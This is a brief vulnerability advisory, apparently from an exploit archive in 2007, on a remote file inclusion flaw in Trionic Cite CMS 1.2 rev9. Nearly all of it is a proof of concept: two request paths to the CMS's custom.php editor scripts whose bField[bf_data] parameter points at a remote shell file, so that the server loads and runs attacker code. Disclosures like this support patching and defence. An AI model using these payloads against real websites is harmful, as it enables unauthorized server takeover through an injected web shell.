trionic-rfi.txt
Posted on 05 October 2007
# Trionic Cite CMS 1.2 rev9 Remote File Inclusion Vulnerabilities # D.S : http://sourceforge.net/project/showfiles.php?group_id=177347 # POC : # /[PHAT]/interface/editors/-custom.php?bField[bf_data]=http://localhost/shell.txt # /[PHAT]/interface/editors/custom.php?bField[bf_data]=http://localhost/shell.txt